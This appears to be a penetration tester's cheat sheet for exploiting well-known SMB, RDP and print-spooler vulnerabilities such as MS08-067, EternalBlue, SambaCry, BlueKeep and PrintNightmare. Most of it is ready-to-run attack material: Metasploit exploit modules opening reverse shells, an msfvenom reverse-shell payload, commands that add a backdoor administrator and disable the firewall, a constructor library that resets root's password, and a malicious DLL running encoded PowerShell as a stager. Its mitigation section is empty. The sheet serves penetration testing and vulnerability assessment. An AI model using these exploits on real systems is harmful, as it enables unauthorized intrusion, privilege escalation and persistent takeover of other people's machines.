Low-Hanging Fruits

net_api

CVE-2008-4250, MS08-067

Check:

$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check

Exploit:

msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalBlue

CVE-2017-0144, MS17-010

MSF

Check:

$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run

Exploit with:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalRomance / EternalSynergy / EternalChampion

Exploit with ms17_010_psexec:

msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

Exploit with ms17_010_command:

msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add"
msf > run

Manually

Send MSF payload and execute it with send_and_execute.py:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe

Or just execute commands on host via zzz_exploit.py (at least one named pipe must be accessible on target):

$ python zzz_exploit.py 192.168.1.11
zzz_exploit.py
# ...
def smb_pwn(conn, arch):
	service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable')
# ...

For x86 EternalBlue shellcodes use AutoBlue-MS17-010.

A patch for grabbing remote files from Victim:

$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch

FuzzBunch (Wine)

SambaCry

CVE-2017-7494 (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)

MSF

msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run

Manually

Compile .so SUID shared library:

pwn.c
// gcc -shared -fPIC -o pwn.so pwn.c

#include <stdio.h>
#include <stdlib.h>

static void pwn() __attribute__((constructor));

void pwn() {
	setresuid(0,0,0);
	system("echo 'root:Passw0rd!'|chpasswd");
}

Get real share path on the target's filesystem:

$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path:    /home/snovvcrash/sharename

Upload pwn.so to target and then run the exploit:

$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7
$ source venv/bin/activate.sh
$ pip install -r requirements.txt
$ . venv/bin/activate
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''

BlueKeep

CVE-2019-0708

Check:

msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run

Exploit:

msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

PrintNightmare

CVE-2021-16751, CVE-2021-34527

Check

CrackMapExec

$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler

ItWasAllADream

$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'

Exploit

C/C++

RCE (fork of the original repo):

LPE:

Python

RCE:

Usage

  1. Prepare an SMB share with anonymous authentication allowed (smbserver.py also works):

  2. Generate an evil DLL: a С2 stager / add user to a privileged group (1, 2, 3, etc.) / invoke a custom command (see example below).

  3. Run the exploit:

$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
pwn.c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Default function that is executed when the DLL is loaded
void Entry() {
    system("powershell -enc <BASE64_PWSH_CODE>");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
      break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
      break;
  }
  return TRUE;
}

C#

RCE + LPE:

PowerShell

LPE:

Reproducibility

Flowchart by @wdormann:

Mitigation

Last updated